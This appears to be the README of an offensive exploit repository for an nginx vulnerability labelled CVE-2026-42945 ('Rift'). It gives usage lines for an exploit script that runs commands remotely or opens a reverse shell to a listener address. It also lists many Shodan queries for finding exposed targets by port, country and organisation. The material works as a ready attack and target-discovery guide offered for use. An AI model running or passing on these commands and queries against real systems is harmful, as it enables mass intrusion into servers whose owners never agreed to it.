Renison-Gohel/CVE-2026-42945-NGINX-Rift

# CVE-2026-42945-NGINX-Rift ``` # 基本使用目标IP python3 exploit.py --target-ip 192.168.1.100 --cmd "id" # 自定义端口 python3 exploit.py --target-ip 192.168.1.100 --port 8080 --cmd "id" # Reverse shell python3 exploit.py --target-ip 192.168.1.100 --shell --listen-ip 10.0.0.1 --listen-port 4444 # 使用旧的 --host 参数（仍然有效） python3 exploit.py --host 192.168.1.100 --cmd "id" ``` ## Shodan 搜索查询 ### 主要 Shodan 搜索查询： ``` # 最具体 - 查找具有 rift 漏洞模式的 nginx http.title:"nginx" port:"19321" # 更一般的 nginx 在非标准端口上搜索 nginx port:"19321" # 搜索具有潜在 rift 漏洞指标的 nginx "nginx/1." "19321" # 在高端口上搜索 nginx（常见于测试/开发环境） nginx port:"8000-9000" http.title:"nginx" # 搜索具有可能指示脆弱配置的特定头信息的 nginx "Server: nginx" "X-Delay" ``` ### 更多针对性查询： ``` # 查找在漏洞利用中使用的特定端口上的 nginx port:19321 nginx # 查找可能在开发环境中运行的 nginx 服务器 nginx "Welcome to nginx" port:8080,8000,8888,19321 # 搜索具有异常端口范围的 nginx（可能部署 rift 的地方） nginx port:10000-20000 # 结合可能指示 rift 端点的 HTTP 方法 "POST /spray" http.title:nginx ``` ### 高级 Shodan 过滤器： ``` # 非常具体 - 查找确切的端口和 nginx port:19321 org:"Your Target Organization" # 在所有非标准端口上查找 nginx（排除 80,443,8080） nginx -port:80,443,8080 # 按国家和特定端口上的 nginx 搜索 port:19321 country:US nginx # 查找具有潜在调试/管理界面的 nginx http.title:"nginx" http.status:200 port:8000-9000 ```

标签：CISA项目, CVE-2026-42945, NGINX服务器, 反向Shell, 命令执行, 威胁模拟, 安全漏洞, 开发环境, 数据统计, 端口扫描, 编程工具, 网络安全, 远程代码执行, 逆向工具, 隐私保护